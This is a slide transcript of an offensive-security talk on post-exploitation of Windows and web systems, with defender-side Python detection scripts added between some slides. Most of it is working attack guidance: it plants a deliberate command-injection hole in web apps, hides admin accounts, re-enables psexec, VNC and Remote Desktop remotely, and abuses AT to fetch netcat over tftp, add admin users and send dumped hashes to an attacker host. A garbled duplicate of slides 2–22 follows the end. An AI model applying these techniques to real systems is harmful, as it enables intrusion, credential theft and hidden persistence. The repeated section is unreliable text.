Meta-Post Exploitation: Using Old, Lost, Forgotten Knowledge (slide transcript)
Val Smith and Colin Ames, Offensive Computing

Slide 1

Meta-Post Exploitation

Val Smith (valsmith@offensivecomputing.net), Colin Ames (amesc@offensivecomputing.net)

Using Old Lost Forgotten Knowledge

Slide 2

Valsmith
  – Affiliations
    • Offensive Computing
    • Metasploit
    • cDc
  – Work:
    • Malware Analyst
    • Reverse Engineer
    • Penetration Tester
    • Exploit developer

Slide 3

Colin Ames
  – Security Researcher, Offensive Computing
  – Steganography Research
  – Penetration Testing
  – Reverse Engineering
  – Malware Analysis

Slide 4

• What is this?
  – Follow up to Val's and HD Moore's Tactical Exploitation talk from last year
  – A talk about the use of automation and tactical tools post-exploitation
  – Applied techniques
  – Good for LARGE environments
  – Different perspectives: some old, some forgotten, some new

Slide 5

Post Exploitation Concepts Overview

Slide 6

What Is Post Exploitation?

• It's what you do after you get root
  – Note: This talk assumes you have access
• Includes:
  – Password Management
  – Persistence
  – Stealth / Evading Detection
  – User Identity Theft
  – Feature Modification
  – Automation & Mass 0wnage

Slide 7

What Is Post Exploitation?

• Getting root is just the beginning
  – How do you spread?
  – How to manage assets as you go along?
• Lots of tools to help you get root
  – Metasploit, Core, Canvas, stand-alone
• But what about after breaking in?
  – Lots of random tools
  – Little automation / standardization
  – Archaic, hard to use, poorly documented
  – Maliciousness often obvious
  – Not scalable to 1000's of hosts (ignoring botnets for this talk)

Slide 8

Password Management

Slide 9

Why Password Management?

  – Large pentests: 1000's of passwords
  – Testing a cracked password on many systems can be time consuming
  – Keeping track of cracking sessions
  – Building and growing your wordlist lets you crack faster
  – Aids in cleanup stage
    • Tying accounts to systems

Slide 10

Password Management Goals

  – Acquired password storage
  – Organization and tracking
    • What passwords go with which hosts
    • What passwords are shared
    • Which users have access to what resources
  – Re-use for further access
  – Expanding wordlist for faster cracking

Slide 11

Password Management Stages & Techniques

  – Acquiring: pwdump, cat /etc/shadow, cachedump, sql query, sniffing
  – Decisions: Prioritize accounts to crack
  – Cracking: John, l0pht, Cain
  – Tracking: Nothing
  – Reusing: Core Impact

Slide 12

Manual Password Management

• Existing Tools
  – L0phtCrack
    • Stores passwords in session files
  – Cain & Abel
    • Static table, difficult to export / use / automate
    • Password Classification (NTLM, Cisco, SQL, md5)
  – Core Impact
    • Good for automated reuse of passwords against many hosts
    • No real storage / management capability
  – Text file / John the Ripper
    • Many people's method
    • Quick and dirty, not easily scalable

Slide 13

Slide 14

• MetaPass
• Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

  – In the old days a rootkit helped you maintain root
  – Today rootkits are all about hiding
  – These two concepts still go hand in hand

Slide 17

Persistence

• Persistence is maintaining access
• Why?
  – Targets can get patched
  – Some exploits are 1 shot only
  – Sometimes you need to return multiple times to the target
  – Target's usefulness not always immediately known
• Goals: Access target as often as needed / useful
• Huge area of study
• Sometimes persistence doesn't matter

Slide 18

Persistence

• Stages of Persistence
  – Initial access
    • Exploit
    • Stolen password, etc.
  – Decisions: What tool to use?
    • FUZZY – OS / Environment / Target dependent
  – Setup
  – Re-accessing of target
  – Cleanup: Don't be a slob, it will get you caught
    • When you no longer need the target, leave no trace

Slide 19

Persistence

• Existing tools
  – Rootkits
  – Backdoors
  – Trojans
  – Port knockers
  – Adding accounts
  – Things like netcat backdoors, inetd modifications, process injection, stealing credentials, etc.

Slide 20

Persistence

• Different perspective on persistence
  – If you can always re-exploit, who cares?
  – Inject / add / modify new vulnerabilities
    • Hard to determine maliciousness
    • We all know it's hard to find bugs now; imagine someone is purposefully putting the bugs in

Slide 21

Persistence

• Leveraging existing persistent admin access
  • Nagios checks
  • Attack Configuration Management
    – Cfengine
    – SMS
    – Automated Patching Systems ("patch" them with our trojans)
  • GUI's
  • Tool distribution

Slide 22

Persistence

• Example
• Machine has VNC installed
• Replace installed VNC with vulnerable version
  – Authentication bypass
• Copy registry password so target doesn't realize
• Persistence with no backdoors or rootkits to get detected

Slide 23

Persistence

• Add vulnerable code
• Example: web apps
  – Take out user input validation
  – Inject your vulnerable code
• Focus on vague intent
• Never be obviously and solely malicious
  – Look for apps with previous vulnerabilities
  – Re-introduce patched bugs

Slide 24

Persistence

• More web app examples
• Add hidden field to HTML form
  – Users detect no change, app performs normally
    <input type="hidden" name="Lang">
• Edit web app and tie vuln perl code to form field input
    if (defined $hidden_field) { open($filename, ">$hidden_field"); }
• Craft a POST including the hidden field

Slide 25

Persistence

• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• Code will execute your commands
• Who needs to bind a shell to a port?
• Unlikely to ever be detected
  – Especially good in big apps
  – Code review can't even be sure of maliciousness
  – Some sites replace code every X time period
• No rootkits to install
• Tripwire probably won't see this
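As an added defender-side example (not code from the talk), the following Python scans web access log lines for the kind of parameter abuse shown on slides 24 and 25: it URL-decodes every query parameter, including double-encoded ones, and flags values carrying shell metacharacters such as the `|` in `lang=|cmd|`. The log lines are constructed; the `/cgi-bin/app.cgi` path and the `lang`/`Lang` parameter names come from the slides, and for POST bodies the same `suspicious_params` check would be applied to the form body by the application or a reverse proxy.

```python
"""Flag web requests whose form/query parameters look like shell command
injection (e.g. lang=|cmd| from the slides).

Added example for this transcript, not code from the talk. The log lines
below are constructed; the parameter names (lang, Lang) and the
/cgi-bin/app.cgi path come from the slides."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Characters a CGI passing a field into perl's 2-arg open() or a shell
# would treat as control syntax rather than data.
SHELL_META = re.compile(r"[|;&`$<>\n]")

# Apache "combined" access log fields we care about.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (double-encoding is used to slip past filters)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(query):
    """Return [(name, decoded_value)] for parameters carrying shell metacharacters."""
    hits = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw)          # parse_qsl already decoded one layer
        if SHELL_META.search(value):
            hits.append((name, value))
    return hits


def scan_access_log(lines):
    """Return [(client_ip, path, [(param, value)])] for each request that trips the check."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                       # not a combined-format line; skip it
        parts = urlsplit(m.group("target"))
        hits = suspicious_params(parts.query)
        if hits:
            findings.append((m.group("ip"), parts.path, hits))
    return findings


# Constructed sample log (not from the talk): a normal request, the slide's
# lang=|cmd| pattern, and a double-encoded variant of it.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Aug/2008:10:00:01 -0600] "GET /cgi-bin/app.cgi?lang=en HTTP/1.1" 200',
    '10.0.0.9 - - [01/Aug/2008:10:00:07 -0600] "GET /cgi-bin/app.cgi?lang=%7Cid%7C HTTP/1.1" 200',
    '10.0.0.9 - - [01/Aug/2008:10:00:09 -0600] "GET /cgi-bin/app.cgi?Lang=%257Cuname%2520-a%257C HTTP/1.1" 200',
]

if __name__ == "__main__":
    for ip, path, hits in scan_access_log(SAMPLE_LOG):
        print(ip, path, hits)
```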

Slide 26

Persistence

• Take concept to another level
  – Add a decoder to web app
  – Look for a "trigger" string combination in form fields
  – If Name = John Smith and Age = 42 then execute contents of Address field
  – URL encode form entries containing commands
  – Have identifier "stub" in encoded data for app to find

Slide 27

Persistence

• Mixing Stealth with Persistence
  – Further encoding
  – Take entries from all fields
  – Concat them
  – "Decode" commands
  – Rotational Ciphers (rot 13, Caesar)
  – Even more complex obfuscation

Slide 28

Persistence

• Covert Accounts
  – Add an account / re-enable
  – Modify local account policies to allow access
    • Ex: SUPPORT_3848576b1, guest
  – Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files / new accounts
  – Unlikely to be discovered

Slide 29

• DEMOS

Slide 30

Stealth / Evading Detection

Slide 31

Stealth / Evading Detection

• Hiding your activity
  – From:
    • IDS
    • AV
    • LOGGING
    • Suspicious users & admins
    • Firewalls
    • Process listing

Slide 32

Stealth / Evading Detection

• Why Stealth?
  – If you get caught you get stopped
  – The longer you can operate undetected, the more you can accomplish
  – Admins won't fix problems they don't know exist (helps persistence)
  – On a pen test you should also be testing the organization's detection and response capabilities

Slide 33

Stealth / Evading Detection

• Goals
  – Keep system operable
    • If it breaks you can't use it
    • Someone will come fix it
  – Operate without fear of detection
  – Robustness
    • Hiding shouldn't require constant attention
  – DON'T LOOK MALICIOUS

Slide 34

Stealth / Evading Detection

• Manual / Existing Tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode Encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels / Steganography
  – Anti-analysis / anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research

Slide 35

Stealth / Evading Detection

• Different Perspective
  – DON'T BE AN ANOMALY
  – Hide in plain sight
    • Many tools have ONLY malicious uses
    • Make your intent hard to determine
  – Be noisy on one to divert attention from another

Slide 36

Stealth / Evading Detection

• Different Perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See Tactical Exploitation talk
    • IDS's can't see normal behavior that is malicious

Slide 37

Stealth / Evading Detection

• Using Windows security objects for stealth
  – Auditing of Securable Objects is controlled by SACL's
  – Null SACL = No Auditing = No Logs
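Added example, not from the talk: a small SDDL parser in Python that reports, for each securable object's security descriptor string, whether it has no SACL at all (the null-SACL case on this slide), an empty SACL, or audit ACEs and what they cover. The descriptor strings are constructed; on a real host they would come from exported ACLs.

```python
"""Check security descriptors (SDDL form) for the 'null SACL' condition the
slide describes: with no SACL there are no audit ACEs, so nothing is logged.

Added example for this transcript, not code from the talk; the SDDL strings
below are constructed."""
import re

SECTION_RE = re.compile(r"(O|G|D|S):")   # owner, group, DACL, SACL sections
ACE_RE = re.compile(r"\(([^)]*)\)")       # one parenthesised ACE


def split_sddl(sddl):
    """Split 'O:..G:..D:..S:..' into a dict keyed by section letter."""
    parts = {}
    matches = list(SECTION_RE.finditer(sddl))
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(sddl)
        parts[m.group(1)] = sddl[m.end():end]
    return parts


def parse_aces(acl_text):
    """Return the ACEs of an ACL body as dicts (type, flags, rights, sid)."""
    aces = []
    for body in ACE_RE.findall(acl_text):
        fields = body.split(";")
        if len(fields) < 6:
            continue                      # malformed ACE, ignore
        aces.append({"type": fields[0], "flags": fields[1],
                     "rights": fields[2], "sid": fields[5]})
    return aces


def audit_coverage(sddl):
    """Describe what the SACL audits.

    Returns (state, entries) where state is 'null-sacl', 'empty-sacl' or
    'audited' and entries is [(sid, audit_success, audit_failure, rights)].
    """
    parts = split_sddl(sddl)
    if "S" not in parts:
        return "null-sacl", []            # no SACL at all: nothing is audited
    aces = [a for a in parse_aces(parts["S"]) if a["type"] in ("AU", "AL")]
    if not aces:
        return "empty-sacl", []           # SACL present but carries no audit ACEs
    entries = [(a["sid"], "SA" in a["flags"], "FA" in a["flags"], a["rights"])
               for a in aces]
    return "audited", entries


def find_unaudited(objects):
    """Given {name: sddl}, return the names whose SACL yields no audit events."""
    return sorted(name for name, sddl in objects.items()
                  if audit_coverage(sddl)[0] != "audited")


# Constructed descriptors for three objects (not from the talk).
SAMPLE_OBJECTS = {
    # DACL only: accessible, but no audit trail at all
    "HKLM\\SOFTWARE\\Example": "O:BAG:SYD:(A;;KA;;;BA)(A;;KR;;;BU)",
    # SACL present but emptied out
    "C:\\secrets\\keys.db": "O:BAG:SYD:(A;;FA;;;BA)S:",
    # success and failure audit of full access by Everyone
    "C:\\secrets\\ledger.db": "O:BAG:SYD:(A;;FA;;;BA)S:(AU;SAFA;FA;;;WD)",
}

if __name__ == "__main__":
    for name in find_unaudited(SAMPLE_OBJECTS):
        print("no auditing:", name, audit_coverage(SAMPLE_OBJECTS[name])[0])
```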

Slide 38

• DEMOS
  – Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior

Slide 41

User Identity Theft

• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change Identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system

Slide 42

User Identity Theft

• Existing tools
  – Incognito (metasploit)
    • Enumerate / hijack tokens
  – FU / FUTO
    • Enable SYSTEM privileges
    • Change process privileges (DKOM)
  – SU / SUDO / KSU
  – Process injection
  – Hijack domain credentials

Slide 43

User Identity Theft

Tokens, Privileges, Security Descriptors, SID's, SACL's, DACL's, ACE's, Oh My!

• What we want
  – Privileges or SID's
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs FUto

Slide 44

• DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities
• Goals
  – Support all Post-Exploitation activities
  – Disabling detection technologies
  – Enabling in-secure or easy to use access software

Slide 47

Feature Modification

• Feature Modification is basically Securable Object Manipulation
  – Remember all those Tokens and Security Descriptors?
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth / Persistence requirements
    • May make it more advantageous to use custom tools
  – Access Objects programmatically
  – Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
  – PsExec: It's still cool (Thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying Local Security Policies

Slide 49

Feature Modification

• Enabling psexec
  – Psexec was a great, awesome remote shell / command tool
  – Everybody now disables clipbook, which psexec requires, l4m3
  – Let's re-enable it

Slide 50

Feature Modification

• Enabling psexec
• Use the system control tool sc.exe
  – Net use \\target\ipc$ /user:name userpassword
  – Sc \\target config netdde start= auto
  – Sc \\target config netddedsdm start= auto
  – Sc \\target config clipsrv start= auto
  – Sc \\target start netdde
  – Sc \\target start netddedsdm
  – Sc \\target start clipsrv

Slide 51

Feature Modification

• Enabling VNC (from command line)
  – Go get VNC (check out guh.nu)
  – Make a folder on the target for the vnc files
  – Copy the following files to target folder
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – Regedit -s vnc.reg
  – Winvnc -install
  – Net start "vnc server"
  – Winvnc
  – Password is "infected"

vnc.reg file contents:

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: System controlling access to security doors
  – No command line way of modifying system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote desktop is fast and already a feature of the OS
  – However it's often disabled, maybe even by GPO

Slide 53

Feature Modification

• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPO's are involved
  – Create a file named fix_ts_policy.ini:

[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =

  – This file will fix policy settings in your way
  – Change "hacked_account" to a real account

Slide 54

Feature Modification

• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000

  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
    • secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"
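Added example, not from the talk: a Python audit that parses a secedit template and a registry export for the changes described on slides 51, 53 and 54 (logon-type denies emptied, SeRemoteInteractiveLogonRight granted to an account outside an allow-list, fDenyTSConnections set to 0, a WinVNC3 key carrying a stored password). The file contents are constructed from the values on the slides, and ADMIN_ACCOUNTS is an assumed allow-list a defender would maintain.

```python
"""Audit a secedit template (.inf) and a registry export (.reg) for the
feature-modification changes the slides describe.

Added example for this transcript, not code from the talk. SAMPLE_INF and
SAMPLE_REG are constructed from the slide values; ADMIN_ACCOUNTS is an
assumed allow-list of principals permitted to hold the RDP logon right."""

ADMIN_ACCOUNTS = {"Administrators", "Remote Desktop Users"}   # assumed allow-list

# Logon-type denies that the slide's template blanks out (lower-cased keys).
DENY_RIGHTS = ("sedenyinteractivelogonright",
               "sedenyremoteinteractivelogonright",
               "sedenynetworklogonright")

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"


def parse_ini(text):
    """Minimal INI/INF/.reg reader: {section: {key: value}} with lower-cased keys."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue                                   # blank or comment
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().strip('"').lower()] = value.strip()
    return sections


def audit_privilege_rights(inf_text):
    """Findings for the [Privilege Rights] section of a secedit template."""
    findings = []
    rights = parse_ini(inf_text).get("Privilege Rights", {})
    for right in DENY_RIGHTS:
        if right in rights and rights[right] == "":
            findings.append(f"{right} cleared: nobody is denied this logon type")
    grantees = {g.strip() for g in rights.get("seremoteinteractivelogonright", "").split(",")
                if g.strip()}
    for g in sorted(grantees - ADMIN_ACCOUNTS):
        findings.append(f"SeRemoteInteractiveLogonRight granted to unexpected account {g}")
    return findings


def audit_registry(reg_text):
    """Findings for a .reg export: RDP switched on, or a WinVNC3 password stored."""
    findings = []
    reg = parse_ini(reg_text)
    ts = reg.get(TS_KEY, {})
    if ts.get("fdenytsconnections", "").lower() == "dword:00000000":
        findings.append("fDenyTSConnections=0: Remote Desktop connections enabled")
    for section, values in reg.items():
        if "\\ORL\\WinVNC3" in section and "password" in values:
            findings.append(f"WinVNC server configured with stored password under {section}")
    return findings


# Constructed inputs mirroring the slides' fix_ts_policy.ini, enable_ts.reg and vnc.reg.
SAMPLE_INF = r"""[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
"""

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"Password"=hex:10,4d,89,3d,5a,e1,55,f8
"""

if __name__ == "__main__":
    for f in audit_privilege_rights(SAMPLE_INF) + audit_registry(SAMPLE_REG):
        print("finding:", f)
```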

Slide 55

• DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• AT command schedules things to run at a specified time and date
  – Schedule service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled

Net use \\target\ipc$ password /user:username
At \\target 12:00 pm command
Ex: At \\192.168.1.1 12:00pm tftp -i myip GET nc.exe

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / Start Services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT – Flow
  • Establish authenticated session
  • Determine the time on the target
  • Pass commands to the target to be run 1 min from now
    – Write a batch file that executes everything at once
    – Have the target send you back whatever info you want
    – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
  – Net use \\target
  – Net time \\target
  – At \\target (net time + 1 min) "tftp -i use GET e.bat"
  – At \\target (net time + 2 min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hashdumping tools and dumps hashes
    • Sends hashes identified by IP back to attacker host
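Added example, not from the talk: Python triage of process-creation command lines for the remote AT pattern on slides 58 to 61, parsing `at \\host time command` and tagging payloads that pull files over tftp, add users or groups, or run a dropped batch file. The command lines are constructed around the slides' own examples; a real feed would be process-creation audit records.

```python
"""Spot the 'AT as a shell' pattern from the slides in process-creation
command lines: a remote 'at \\\\host <time> <command>' whose payload pulls a
file over tftp, adds users or groups, or runs a dropped batch file.

Added example for this transcript, not code from the talk. SAMPLE_CMDLINES
is constructed around the slides' own examples."""
import re

# at [\\computername] time [/interactive] [/every:... | /next:...] "command"
AT_RE = re.compile(
    r"^\s*at(?:\.exe)?\s+\\\\(?P<host>\S+)\s+"
    r"(?P<time>\d{1,2}:\d{2}\s*(?:am|pm)?)\s+"
    r"(?:/interactive\s+)?(?:/(?:every|next):\S+\s+)?"
    r"(?P<command>.+)$",
    re.IGNORECASE,
)

# Payload traits taken from the slides; each hit names why the job stood out.
PAYLOAD_TRAITS = [
    ("tftp-transfer", re.compile(r"\btftp\b.*\b(get|put)\b", re.I)),
    ("user-add", re.compile(r"\bnet\s+user\b.*/add\b", re.I)),
    ("group-add", re.compile(r"\bnet\s+localgroup\b.*/add\b", re.I)),
    ("batch-file", re.compile(r"\.bat\b", re.I)),
]


def parse_remote_at(cmdline):
    """Return {'host', 'time', 'command'} for a remote AT job, else None."""
    m = AT_RE.match(cmdline.strip())
    return m.groupdict() if m else None


def classify(cmdline):
    """Return (host, command, [traits]) for a remote AT job, or None otherwise."""
    job = parse_remote_at(cmdline)
    if job is None:
        return None
    traits = [name for name, rx in PAYLOAD_TRAITS if rx.search(job["command"])]
    return job["host"], job["command"], traits


def triage(cmdlines):
    """Group remote AT jobs with at least one suspicious trait by target host."""
    by_host = {}
    for cmdline in cmdlines:
        result = classify(cmdline)
        if result is None:
            continue                       # not a remote AT invocation
        host, command, traits = result
        if traits:                         # plain scheduled maintenance is left alone
            by_host.setdefault(host, []).append((command, traits))
    return by_host


# Constructed command lines: the slides' tftp/e.bat sequence, a benign
# recurring job, and a local command that is not an AT job at all.
SAMPLE_CMDLINES = [
    r'at \\192.168.1.1 12:00pm tftp -i 10.9.9.9 GET nc.exe',
    r'at \\192.168.1.1 12:01pm "tftp -i 10.9.9.9 GET e.bat"',
    r'at \\192.168.1.1 12:02pm e.bat',
    r'at \\fileserver 02:00 /every:M,T,W,Th,F backup.cmd',
    r'net user hacked hacked /add',
]

if __name__ == "__main__":
    for host, jobs in triage(SAMPLE_CMDLINES).items():
        for command, traits in jobs:
            print(host, traits, command)
```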

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – Establish netbios session / credentials on a range of hosts
• MassWinenum – Enumerate Netbios information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts

Slide 66

• DEMOS

Slide 67

• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to:
    • All the people from offensivecomputing, nologin, uninformed IRC and SILC channels
    • HD Moore especially for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 2: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 2

Valsmithndash Affiliations

bull Offensive Computingbull Metasploitbull cDc

ndash Workbull Malware Analystbull Reverse Engineerbull Penetration Testerbull Exploit developer

Slide 3

Colin Amesndash Security Researcher Offensive Computingndash Steganography Researchndash Penetration Testingndash Reverse Engineeringndash Malware Analysis

Slide 4

bull What is thisndash Follow up to Valrsquos and HD Moorersquos

Tactical Exploitation talk from last yearndash A talk about the use of automation

and tactical tools post-exploitationndash Applied techniques ndash Good for LARGE environmentsndash Different perspectives some old

some forgotten some new

Slide 5

Post Exploitation Concepts Overview

Slide 6

What Is Post Exploitation

bull Itrsquos what you do after you get rootndash Note This talk assumes you have access

bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage

Slide 7

What Is Post Exploitation

bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along

bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone

bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)

Slide 8

Password Management

Slide 9

Why Password Management

ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many

systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets

you crack fasterndash Aids in cleanup stage

bull Tying accounts to systems

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

